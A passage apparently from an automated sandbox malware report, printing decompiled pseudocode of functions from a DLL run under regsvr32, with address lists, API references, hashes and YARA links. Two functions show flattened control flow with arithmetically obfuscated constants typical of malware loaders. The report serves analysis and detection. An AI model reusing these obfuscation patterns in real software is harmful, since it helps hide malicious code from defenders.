									 *_t169 =  *((intOrPtr*)(_t234 - 0x10));
								}
								 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
								E6DA3F275(_t234 - 0x14);
								_t172 = 1;
								L40:
								return E6DA5C8E5(_t172);
							}
							goto L12;
						}
					}
					_t226 =  *(_t234 + 0x10);
					__eflags =  *_t226;
					if( *_t226 == 0) {
						goto L39;
					}
					_push(_t234 - 0x10);
					_push(_t226);
					_push( *((intOrPtr*)(_t234 + 0xc)));
					_t194 =  *((intOrPtr*)( *__ecx + 0xf4))();
					goto L6;
				}
				_push( *(_t234 + 0x10));
				_push( *((intOrPtr*)(_t234 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xf0))() == 0) {
					goto L39;
				}
				goto L2;
			}

0x6da42386
0x6da42386
0x6da4238d
0x6da42392
0x6da42396
0x6da42399
0x6da423a0
0x6da423a3
0x6da423ac
0x6da423d0
0x6da423d3
0x6da423ff
0x6da42402
0x6da42405
0x6da42412
0x6da42412
0x6da42417
0x6da4241a
0x6da42430
0x6da42430
0x6da42433
0x6da42435
0x6da42484
0x6da42488
0x6da42495
0x6da4249e
0x6da424a9
0x6da424af
0x6da424b2
0x6da424b4
0x6da424e4
0x6da424e4
0x6da424e7
0x6da424ed
0x6da424ef
0x6da4257e
0x6da4257e
0x6da42581
0x00000000
0x00000000
0x6da424f7
0x6da424fe
0x6da42500
0x6da42502
0x6da42546
0x6da4254b
0x6da42569
0x6da4256e
0x6da42570
0x6da42572
0x00000000
0x00000000
0x6da42554
0x6da42556
0x6da42912
0x6da42915
0x6da4291a
0x6da4291a
0x6da4291d
0x6da4291d
0x6da4291e
0x6da4291e
0x6da42921
0x6da42923
0x6da42925
0x6da42925
0x00000000
0x6da42925
0x6da4255c
0x6da4255e
0x6da42560
0x6da42565
0x6da42565
0x6da42568
0x6da42568
0x6da42574
0x6da42577
0x6da42579
0x6da4257b
0x00000000
0x6da4257b
0x6da42504
0x6da42507
0x6da4250a
0x6da4250f
0x6da42512
0x6da42514
0x00000000
0x00000000
0x6da42519
0x6da4251f
0x6da42524
0x6da4252d
0x6da42530
0x6da42533
0x00000000
0x00000000
0x6da42539
0x00000000
0x6da425c4
0x00000000
0x00000000
0x6da425ce
0x00000000
0x00000000
0x6da425e8
0x6da425ea
0x6da425ea
0x6da425ed
0x6da425ee
0x6da425f1
0x6da425f5
0x00000000
0x00000000
0x6da42604
0x6da42608
0x00000000
0x00000000
0x6da4260f
0x6da425c5
0x6da425c5
0x6da425c7
0x00000000
0x00000000
0x6da42612
0x6da4261a
0x6da4261d
0x6da42620
0x6da42624
0x6da42627
0x6da4262c
0x6da4262e
0x6da42632
0x6da42636
0x6da42639
0x6da4263e
0x6da42640
0x6da42642
0x6da42645
0x6da42647
0x6da4264c
0x6da4264f
0x6da42654
0x6da42656
0x6da42658
0x6da42658
0x6da42656
0x6da4265b
0x6da4265b
0x6da4265e
0x6da4265f
0x6da42660
0x6da42663
0x6da42664
0x6da42666
0x6da42668
0x6da4266c
0x6da4266c
0x6da4266c
0x6da42670
0x6da42673
0x6da42676
0x6da4267a
0x00000000
0x00000000
0x6da42690
0x6da42698
0x6da4269b
0x6da4269e
0x6da426a1
0x6da426a4
0x6da426a5
0x6da426a7
0x6da426ab
0x6da426ad
0x6da426b1
0x6da4267f
0x6da4267f
0x6da42682
0x6da42686
0x00000000
0x00000000
0x6da426b6
0x6da426b9
0x6da426b9
0x6da426bc
0x6da426be
0x00000000
0x00000000
0x6da426d0
0x6da426d3
0x6da426d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6da426e3
0x6da426e4
0x6da426e7
0x6da426c3
0x6da426c3
0x6da426c4
0x6da425fa
0x6da425fa
0x6da425fb
0x6da425fd
0x00000000
0x00000000
0x6da42902
0x00000000
0x00000000
0x6da426ec
0x00000000
0x00000000
0x6da426f8
0x6da426fa
0x00000000
0x00000000
0x6da42701
0x6da42704
0x6da42704
0x6da42707
0x6da42708
0x00000000
0x00000000
0x6da42718
0x6da42719
0x00000000
0x00000000
0x6da4271e
0x6da42720
0x6da42720
0x6da42723
0x6da42724
0x00000000
0x00000000
0x6da425dd
0x00000000
0x00000000
0x6da425d3
0x6da425d5
0x00000000
0x00000000
0x6da4273c
0x6da42743
0x6da42744
0x6da42746
0x6da42749
0x6da42749
0x6da42749
0x00000000
0x00000000
0x6da42752
0x00000000
0x00000000
0x6da4275d
0x00000000
0x00000000
0x6da42766
0x6da4276a
0x6da4276b
0x6da4276e
0x6da42772
0x00000000
0x00000000
0x6da42779
0x00000000
0x00000000
0x6da42783
0x6da4277c
0x6da4277c
0x6da42757
0x6da42757
0x00000000
0x00000000
0x6da42786
0x6da42788
0x6da42788
0x6da4278b
0x6da4278c
0x00000000
0x00000000
0x6da4279a
0x6da4279d
0x6da427a0
0x6da427a3
0x6da4278f
0x6da4278f
0x6da42793
0x00000000
0x00000000
0x6da427a6
0x6da427aa
0x00000000
0x00000000
0x6da427b4
0x6da427b7
0x6da427b7
0x6da427ba
0x6da427bc
0x00000000
0x00000000
0x6da427c8
0x6da427cb
0x6da427ce
0x6da427d1
0x6da427d4
0x6da427d7
0x6da427da
0x6da427dd
0x6da427f1
0x6da427f2
0x00000000
0x6da427f2
0x6da427e5
0x6da427e6
0x6da427e9
0x00000000
0x00000000
0x6da427f8
0x6da426ef
0x6da426ef
0x6da426f1
0x00000000
0x00000000
0x6da427fe
0x6da427ff
0x6da42802
0x6da42804
0x00000000
0x00000000
0x6da425ac
0x6da425af
0x6da425b2
0x6da425b5
0x6da425b6
0x6da425b6
0x00000000
0x00000000
0x6da4280b
0x6da4280e
0x6da4280f
0x6da427c1
0x6da427c1
0x6da427c2
0x6da4274c
0x6da4274c
0x00000000
0x00000000
0x6da42814
0x6da42817
0x6da4281a
0x6da4281d
0x6da42727
0x6da42727
0x6da42728
0x6da4272b
0x6da4272b
0x6da4272d
0x00000000
0x00000000
0x6da42823
0x6da42826
0x6da42829
0x6da4282c
0x6da4282d
0x6da42831
0x6da42834
0x6da42835
0x6da42839
0x6da4283a
0x6da4283c
0x6da4283e
0x6da423f2
0x6da423f2
0x6da423f4
0x00000000
0x00000000
0x00000000
0x00000000
0x6da42846
0x6da42849
0x6da4284c
0x6da4284f
0x6da42850
0x6da42854
0x6da42857
0x6da42858
0x6da4285c
0x6da4285d
0x6da4285f
0x00000000
0x00000000
0x00000000
0x00000000
0x6da42866
0x6da42868
0x6da4286a
0x6da4286d
0x6da4286f
0x00000000
0x00000000
0x6da42596
0x6da42596
0x6da4259d
0x6da425a2
0x6da425a2
0x00000000
0x00000000
0x6da4287b
0x6da425e2
0x6da425e2
0x6da42903
0x6da42903
0x00000000
0x00000000
0x6da4288b
0x00000000
0x00000000
0x6da42891
0x6da42895
0x00000000
0x00000000
0x6da4289f
0x6da428a2
0x6da428a3
0x6da428a5
0x6da428a8
0x6da428aa
0x6da428b0
0x6da428b1
0x6da428b1
0x6da428b6
0x6da428ba
0x00000000
0x00000000
0x6da428c9
0x6da428cd
0x6da4270c
0x6da4270c
0x6da42906
0x6da42906
0x6da42908
0x00000000
0x00000000
0x6da428d3
0x6da428d6
0x6da428d9
0x6da428dc
0x6da428dd
0x6da428e1
0x6da428e4
0x6da428e5
0x6da428bf
0x6da428bf
0x00000000
0x00000000
0x6da428eb
0x6da428ee
0x6da428f1
0x6da428f4
0x6da428f5
0x6da428f9
0x6da428fc
0x6da428fd
0x6da428c0
0x6da428c0
0x6da428c2
0x00000000
0x00000000
0x6da42539
0x6da42587
0x6da4258a
0x6da4258a
0x6da4258a
0x6da42591
0x00000000
0x6da42591
0x6da424b9
0x6da424bb
0x6da424be
0x00000000
0x00000000
0x6da424c0
0x6da424c6
0x6da424c9
0x6da424ce
0x6da424d0
0x00000000
0x00000000
0x6da424d6
0x6da424dd
0x00000000
0x00000000
0x00000000
0x6da424df
0x6da42437
0x6da4243b
0x00000000
0x00000000
0x6da4243d
0x6da42443
0x6da4244d
0x6da4244d
0x6da42453
0x6da4245d
0x6da42463
0x6da42466
0x00000000
0x00000000
0x6da42468
0x6da42476
0x6da4247c
0x6da4247e
0x00000000
0x00000000
0x00000000
0x6da4247e
0x6da42455
0x6da4245b
0x00000000
0x00000000
0x00000000
0x6da4245b
0x6da42445
0x6da4244b
0x00000000
0x00000000
0x00000000
0x6da4241c
0x6da42427
0x6da4242c
0x6da4242e
0x6da423c4
0x6da423c4
0x6da42928
0x6da42928
0x6da4292d
0x6da42932
0x6da42932
0x6da42934
0x6da4293b
0x6da42942
0x6da425a4
0x6da425a9
0x6da425a9
0x00000000
0x6da4242e
0x6da4241a
0x6da423d5
0x6da423d8
0x6da423da
0x00000000
0x00000000
0x6da423e5
0x6da423e6
0x6da423e7
0x6da423ec
0x00000000
0x6da423ec
0x6da423ae
0x6da423b3
0x6da423be
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 6DA4238D

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 0d0fe98ccd731987b9435f72d1ed419779bbdcc0fcc395a9babe241768962d6a
Instruction ID: d188df886cc3c0759e5bcd5b00adee450b1479a0f1dea8006978b5a2409f7e84
Opcode Fuzzy Hash: 0d0fe98ccd731987b9435f72d1ed419779bbdcc0fcc395a9babe241768962d6a
Instruction Fuzzy Hash: 12F1AC7451821AEFDB25CF68C990ABE7BA9FF09314F01C519F915EB291CB34D980CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6DA3DDD4 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA3DDD4(intOrPtr __ebx, intOrPtr __esi, void* __eflags) {
				signed int _v8;
				struct _OSVERSIONINFOA _v156;
				signed int _t9;
				intOrPtr _t21;
				intOrPtr _t22;
				char _t24;
				signed int _t27;

				_t25 = _t27;
				_t9 =  *0x6da82744; // 0x616b45bb
				_v8 = _t9 ^ _t27;
				E6DA5C5A0(_t22,  &(_v156.dwMajorVersion), 0, 0x90);
				_v156.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v156);
				return E6DA59DE2(0 | _v156.dwPlatformId == 0x00000002, __ebx, _v8 ^ _t25, _t21, _t22, __esi, _t24);
			}

0x6da3ddd7
0x6da3dddf
0x6da3dde6
0x6da3ddf7
0x6da3de06
0x6da3de10
0x6da3de2d

APIs

GetVersionExA.KERNEL32(?), ref: 6DA3DE10

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: a0c52f4e24e8e46e7a58c7610af25c15c8af319f27724c545e00f3c7711e08d5
Instruction ID: 90e2c40bd01a496ece2436ebd90e08c3e750c1b7eb855c03215f6fa2fe6b0349
Opcode Fuzzy Hash: a0c52f4e24e8e46e7a58c7610af25c15c8af319f27724c545e00f3c7711e08d5
Instruction Fuzzy Hash: A9F0E5769042089FDB60DF70CE45B8EB7B8AB09204F5140A49A0ED2281EF309A89CB41

Uniqueness

Uniqueness Score: -1.00%

Function 6DA3D310 Relevance: 1.5, APIs: 1, Instructions: 11
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6DA3D310(intOrPtr __ecx) {
				intOrPtr _v8;

				_push(__ecx);
				_v8 = __ecx;
				return IsIconic( *(_v8 + 0x20));
			}

0x6da3d313
0x6da3d314
0x6da3d327

APIs

IsIconic.USER32(?), ref: 6DA3D31E

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: 2ff53d6a2f1b5279bcd32c5acfcf9c873b68773472c401e6880a0fc20ddacd27
Instruction ID: 5f498f2cf0e2647d2dcca33d0f57fa68d5d71b33e287bf54b446d47c10651292
Opcode Fuzzy Hash: 2ff53d6a2f1b5279bcd32c5acfcf9c873b68773472c401e6880a0fc20ddacd27
Instruction Fuzzy Hash: B2C01274519308AB8704CB85E500C19B7BCE709200B0042CCF8088330096329D008654

Uniqueness

Uniqueness Score: -1.00%

Function 1001BAF2 Relevance: 1.5, Strings: 1, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1001BAF2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				intOrPtr _v68;
				char _v76;
				intOrPtr _v84;
				intOrPtr _v104;
				char _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				unsigned int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				void* _t140;
				signed int _t153;
				signed int _t162;
				void* _t169;
				void* _t171;
				void* _t181;
				intOrPtr* _t183;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int* _t205;
				void* _t207;

				_push(_a8);
				_t169 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t140);
				_v144 = _v144 & 0x00000000;
				_t205 =  &(( &_v212)[4]);
				_v156 = 0xf6cc02;
				_v152 = 0xcb83f4;
				_t171 = 0x42cbfd9;
				_v148 = 0xbe8382;
				_v196 = 0xb25bf;
				_v196 = _v196 | 0x6f9b2e6c;
				_t201 = 0x1d;
				_v196 = _v196 * 0x72;
				_v196 = _v196 ^ 0xc3f88356;
				_v196 = _v196 ^ 0x70e3dcd8;
				_v180 = 0xe3819a;
				_v180 = _v180 / _t201;
				_v180 = _v180 << 0xa;
				_v180 = _v180 ^ 0x1f615000;
				_v188 = 0x9d743b;
				_v188 = _v188 >> 1;
				_v188 = _v188 + 0xffffc7f5;
				_v188 = _v188 ^ 0x004111dd;
				_v204 = 0xf95cc7;
				_v204 = _v204 << 0xa;
				_v204 = _v204 + 0xffff73e8;
				_v204 = _v204 << 0xe;
				_v204 = _v204 ^ 0xa3f30a9e;
				_v208 = 0xa7f86d;
				_v208 = _v208 + 0xffffcacb;
				_v208 = _v208 | 0xd01eab79;
				_v208 = _v208 ^ 0x380734f4;
				_v208 = _v208 ^ 0xe8b64fed;
				_v172 = 0x8f49a4;
				_v172 = _v172 + 0x587c;
				_v172 = _v172 ^ 0x00847bb3;
				_v168 = 0x204b12;
				_v168 = _v168 | 0xba434697;
				_v168 = _v168 ^ 0xba6ee37b;
				_v212 = 0xa86051;
				_v212 = _v212 | 0xf11d4ba7;
				_v212 = _v212 + 0xffffc0b7;
				_v212 = _v212 ^ 0xc7d98e84;
				_v212 = _v212 ^ 0x3666d0d3;
				_v184 = 0xd22a3e;
				_v184 = _v184 * 0x4b;
				_v184 = _v184 ^ 0x3d9fdcd2;
				_v192 = 0x69bafd;
				_v192 = _v192 << 8;
				_v192 = _v192 + 0xffff7f09;
				_v192 = _v192 >> 7;
				_v192 = _v192 ^ 0x00d5aae6;
				_t202 = _v184;
				_t200 = _v184;
				_v176 = 0xb5d7e8;
				_v176 = _v176 * 0x6d;
				_v176 = _v176 + 0x48a1;
				_v176 = _v176 ^ 0x4d698107;
				_v200 = 0x6eff14;
				_v200 = _v200 >> 2;
				_v200 = _v200 + 0x5d8d;
				_v200 = _v200 + 0xceca;
				_v200 = _v200 ^ 0x001ce1b2;
				while(1) {
					_t207 = _t171 - 0xa0c00aa;
					if(_t207 > 0) {
						goto L25;
					}
					L2:
					if(_t207 == 0) {
						_t183 =  *0x1002507c;
						_t200 = _t200 + 1;
						 *((intOrPtr*)(_t202 + 4)) =  *_t183;
						 *_t183 = _t202;
						goto L10;
					} else {
						if(_t171 == 0xa3bdff) {
							__eflags = _v104 - 4;
							if(__eflags == 0) {
								E10002279( &_v76);
								goto L14;
							} else {
								_t171 = 0xd38a87a;
								continue;
							}
							goto L43;
						} else {
							if(_t171 == 0x1b5f501) {
								__eflags = _v104 - 1;
								if(__eflags == 0) {
									E1001F24C( &_v76);
									goto L14;
								} else {
									_t171 = 0xb6ef4db;
									continue;
								}
								goto L43;
							} else {
								if(_t171 == 0x1e7eefc) {
									_t153 = E1001E831( &_v60, _v208, __eflags,  &_v164, _v172, _v168, _v212);
									_t205 =  &(_t205[4]);
									__eflags = _t153;
									if(__eflags != 0) {
										L17:
										_t171 = 0xe1bc935;
										continue;
									}
								} else {
									if(_t171 == 0x42cbfd9) {
										_t200 = _v196;
										E10004603(_v188, _v204, _t169,  &_v60);
										_t171 = 0x7df49fa;
										continue;
									} else {
										if(_t171 == 0x6477a30) {
											__eflags = _v104 - 3;
											if(__eflags == 0) {
												E1002086F( &_v76);
												L14:
												_t171 = 0xa0c00aa;
												continue;
											} else {
												_t171 = 0xa3bdff;
												while(1) {
													_t207 = _t171 - 0xa0c00aa;
													if(_t207 > 0) {
														goto L25;
													}
													goto L2;
												}
												goto L25;
											}
											L43:
										} else {
											if(_t171 != 0x7df49fa) {
												L41:
												__eflags = _t171 - 0xd7322d;
											} else {
												E1000BB23(_v180);
												L10:
												_t171 = 0x1e7eefc;
												continue;
												do {
													while(1) {
														_t207 = _t171 - 0xa0c00aa;
														if(_t207 > 0) {
															goto L25;
														}
														goto L2;
													}
													goto L41;
												} while (__eflags != 0);
											}
										}
									}
								}
							}
						}
					}
					L42:
					return _t200;
					goto L43;
					L25:
					__eflags = _t171 - 0xb290778;
					if(_t171 == 0xb290778) {
						__eflags = _v104 - 6;
						if(__eflags != 0) {
							goto L14;
						} else {
							E1001692B( &_v76);
							_t171 = 0xa0c00aa;
							goto L41;
						}
					} else {
						__eflags = _t171 - 0xb6ef4db;
						if(_t171 == 0xb6ef4db) {
							__eflags = _v104 - 2;
							if(__eflags == 0) {
								E100213FD( &_v76, _t202);
								goto L14;
							} else {
								_t171 = 0x6477a30;
								continue;
							}
							goto L43;
						} else {
							__eflags = _t171 - 0xd38a87a;
							if(_t171 == 0xd38a87a) {
								__eflags = _v104 - 5;
								if(__eflags == 0) {
									E1000CED8( &_v76, _t202);
									goto L14;
								} else {
									_t171 = 0xb290778;
									continue;
								}
								goto L43;
							} else {
								__eflags = _t171 - 0xe1bc935;
								if(_t171 == 0xe1bc935) {
									_t162 = E1001B687(_v184, _v192,  &_v140,  &_v164);
									asm("sbb ecx, ecx");
									_t171 = ( ~_t162 & 0x0c8f6e30) + 0x1e7eefc;
									continue;
								} else {
									__eflags = _t171 - 0xe775d2c;
									if(_t171 != 0xe775d2c) {
										goto L41;
									} else {
										_push(_t171);
										_t181 = 0x30;
										_t202 = E1001EAA3(_t181);
										__eflags = _t202;
										if(__eflags == 0) {
											goto L17;
										} else {
											_t171 = 0x1b5f501;
											 *((intOrPtr*)(_t202 + 0x28)) = _v84;
											 *((intOrPtr*)(_t202 + 0x10)) = _v68;
											 *((intOrPtr*)(_t202 + 0x14)) = _v140;
											continue;
										}
										goto L43;
									}
								}
							}
						}
					}
					goto L42;
				}
			}

0x1001bafc
0x1001bb03
0x1001bb05
0x1001bb0c
0x1001bb0d
0x1001bb0e
0x1001bb13
0x1001bb18
0x1001bb1b
0x1001bb25
0x1001bb2d
0x1001bb32
0x1001bb3f
0x1001bb47
0x1001bb56
0x1001bb57
0x1001bb5b
0x1001bb63
0x1001bb6b
0x1001bb79
0x1001bb7d
0x1001bb82
0x1001bb8a
0x1001bb92
0x1001bb96
0x1001bb9e
0x1001bba6
0x1001bbae
0x1001bbb3
0x1001bbbb
0x1001bbc0
0x1001bbc8
0x1001bbd0
0x1001bbd8
0x1001bbe0
0x1001bbe8
0x1001bbf0
0x1001bbf8
0x1001bc00
0x1001bc08
0x1001bc10
0x1001bc18
0x1001bc20
0x1001bc28
0x1001bc30
0x1001bc38
0x1001bc40
0x1001bc48
0x1001bc55
0x1001bc59
0x1001bc61
0x1001bc69
0x1001bc6e
0x1001bc76
0x1001bc7b
0x1001bc83
0x1001bc87
0x1001bc8b
0x1001bc98
0x1001bc9c
0x1001bca4
0x1001bcac
0x1001bcb4
0x1001bcb9
0x1001bcc1
0x1001bcc9
0x1001bcd1
0x1001bcd1
0x1001bcd3
0x00000000
0x00000000
0x1001bcd9
0x1001bcd9
0x1001bde6
0x1001bdec
0x1001bdef
0x1001bdf2
0x00000000
0x1001bcdf
0x1001bce5
0x1001bdc4
0x1001bdc9
0x1001bddc
0x00000000
0x1001bdcb
0x1001bdcb
0x00000000
0x1001bdcb
0x00000000
0x1001bceb
0x1001bcf1
0x1001bda5
0x1001bdaa
0x1001bdbd
0x00000000
0x1001bdac
0x1001bdac
0x00000000
0x1001bdac
0x00000000
0x1001bcf7
0x1001bcfd
0x1001bd8b
0x1001bd90
0x1001bd93
0x1001bd95
0x1001bd9b
0x1001bd9b
0x00000000
0x1001bd9b
0x1001bcff
0x1001bd05
0x1001bd49
0x1001bd5e
0x1001bd65
0x00000000
0x1001bd07
0x1001bd0d
0x1001bd2b
0x1001bd30
0x1001bd40
0x1001bd45
0x1001bd45
0x00000000
0x1001bd32
0x1001bd32
0x1001bcd1
0x1001bcd1
0x1001bcd3
0x00000000
0x00000000
0x00000000
0x1001bcd3
0x00000000
0x1001bcd1
0x00000000
0x1001bd0f
0x1001bd15
0x1001bf03
0x1001bf03
0x1001bd1b
0x1001bd1f
0x1001bd24
0x1001bd24
0x1001bd29
0x1001bcd1
0x1001bcd1
0x1001bcd1
0x1001bcd3
0x00000000
0x00000000
0x00000000
0x1001bcd3
0x00000000
0x1001bcd1
0x1001bcd1
0x1001bd15
0x1001bd0d
0x1001bd05
0x1001bcfd
0x1001bcf1
0x1001bce5
0x1001bf0f
0x1001bf1b
0x00000000
0x1001bdf9
0x1001bdf9
0x1001bdff
0x1001beea
0x1001beef
0x00000000
0x1001bef5
0x1001befc
0x1001bf01
0x00000000
0x1001bf01
0x1001be05
0x1001be05
0x1001be0b
0x1001bec6
0x1001becb
0x1001bee0
0x00000000
0x1001becd
0x1001becd
0x00000000
0x1001becd
0x00000000
0x1001be11
0x1001be11
0x1001be17
0x1001bea2
0x1001bea7
0x1001bebc
0x00000000
0x1001bea9
0x1001bea9
0x00000000
0x1001bea9
0x00000000
0x1001be1d
0x1001be1d
0x1001be23
0x1001be84
0x1001be8f
0x1001be97
0x00000000
0x1001be25
0x1001be25
0x1001be2b
0x00000000
0x1001be31
0x1001be39
0x1001be3c
0x1001be42
0x1001be45
0x1001be47
0x00000000
0x1001be4d
0x1001be54
0x1001be59
0x1001be63
0x1001be6a
0x00000000
0x1001be6a
0x00000000
0x1001be47
0x1001be2b
0x1001be23
0x1001be17
0x1001be0b
0x00000000
0x1001bdff

Strings

|X, xrefs: 1001BBF8

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: |X
API String ID: 0-2816736707
Opcode ID: 2ca9ed00df92237b31ace285071d20484ea0ac458b7f384c4367444a59623bbf
Instruction ID: 886d616568261d283c8a1febe3bf5f9d80346016641903a4c61a731ffe6b8bca
Opcode Fuzzy Hash: 2ca9ed00df92237b31ace285071d20484ea0ac458b7f384c4367444a59623bbf
Instruction Fuzzy Hash: 3BA16975508B408BC3A8CF21D49566FBBE1FBC8348F50491EF6965A660DB70DA89CF83

Uniqueness

Uniqueness Score: -1.00%

Function 100141CF Relevance: 1.5, Strings: 1, Instructions: 209
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E100141CF(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr* _t197;
				intOrPtr _t205;
				void* _t207;
				intOrPtr _t213;
				intOrPtr _t214;
				intOrPtr _t215;
				intOrPtr _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				intOrPtr _t243;
				intOrPtr _t245;
				intOrPtr _t246;
				intOrPtr _t247;
				signed int* _t248;

				_t248 =  &_v100;
				_v20 = __edx;
				_v36 = __ecx;
				_v12 = 0x8760e1;
				_v4 = 0;
				_v8 = 0x103c9a;
				_v80 = 0xf788f5;
				_v40 = 0;
				_v80 = _v80 * 0x78;
				_t237 = 0x70;
				_v80 = _v80 / _t237;
				_v80 = _v80 | 0x9e078109;
				_v80 = _v80 ^ 0x9f0fb74f;
				_v44 = 0x3ab70b;
				_v44 = _v44 + 0xffff7d25;
				_v44 = _v44 ^ 0x003d4b87;
				_v60 = 0xc05898;
				_v60 = _v60 + 0xffff47b3;
				_v60 = _v60 ^ 0x63c6707a;
				_v60 = _v60 ^ 0x6370e4f6;
				_v100 = 0xa766ed;
				_v100 = _v100 + 0x477e;
				_t238 = 0x14;
				_t207 = 0x4459659;
				_v100 = _v100 * 0x19;
				_v100 = _v100 * 7;
				_v100 = _v100 ^ 0x72a0f26b;
				_v76 = 0xa75565;
				_v76 = _v76 + 0xffff0307;
				_v76 = _v76 >> 9;
				_v76 = _v76 ^ 0x000b6bcc;
				_v52 = 0xe80f68;
				_v52 = _v52 << 0xb;
				_v52 = _v52 ^ 0x4071ef7f;
				_v68 = 0xb21828;
				_v68 = _v68 + 0xffff38d7;
				_v68 = _v68 / _t238;
				_v68 = _v68 ^ 0x00061ccb;
				_v72 = 0x1f9896;
				_t239 = 0x66;
				_v72 = _v72 / _t239;
				_v72 = _v72 | 0xe6c26ff8;
				_v72 = _v72 ^ 0xe6cbcf13;
				_v88 = 0xa38b56;
				_v88 = _v88 << 0xa;
				_v88 = _v88 >> 2;
				_v88 = _v88 + 0x29c6;
				_v88 = _v88 ^ 0x238f1733;
				_v92 = 0x23e6b6;
				_v92 = _v92 + 0xffff85e6;
				_v92 = _v92 >> 1;
				_v92 = _v92 | 0x5e498f96;
				_v92 = _v92 ^ 0x5e571664;
				_v96 = 0xc4ab8f;
				_v96 = _v96 ^ 0x3e310e03;
				_v96 = _v96 + 0xffff7488;
				_v96 = _v96 << 8;
				_v96 = _v96 ^ 0xf51666ef;
				_v48 = 0x3b06a6;
				_v48 = _v48 | 0x1812c5bc;
				_v48 = _v48 ^ 0x1832875b;
				_v64 = 0x85b8f4;
				_t240 = 0x4b;
				_v64 = _v64 / _t240;
				_v64 = _v64 | 0xd070b119;
				_v64 = _v64 ^ 0xd070957a;
				_v84 = 0x6d7188;
				_t241 = 0x32;
				_v84 = _v84 / _t241;
				_v84 = _v84 + 0xffff180d;
				_t242 = 0x48;
				_t243 = _v16;
				_t236 = _v20;
				_t245 = _v20;
				_t205 = _v20;
				_v84 = _v84 / _t242;
				_v84 = _v84 ^ 0x0005a9d5;
				_v56 = 0xf0f654;
				_v56 = _v56 * 0x5a;
				_v56 = _v56 | 0x8c6f6977;
				_v56 = _v56 ^ 0xdcf91d64;
				while(_t207 != 0x4459659) {
					if(_t207 == 0x556667b) {
						_t243 = 0x10000;
						_push(_t207);
						_t236 = E1001EAA3(0x10000);
						if(_t236 == 0) {
							goto L14;
						} else {
							_t245 = _t236;
							_t205 = 0x10000;
							goto L9;
						}
					} else {
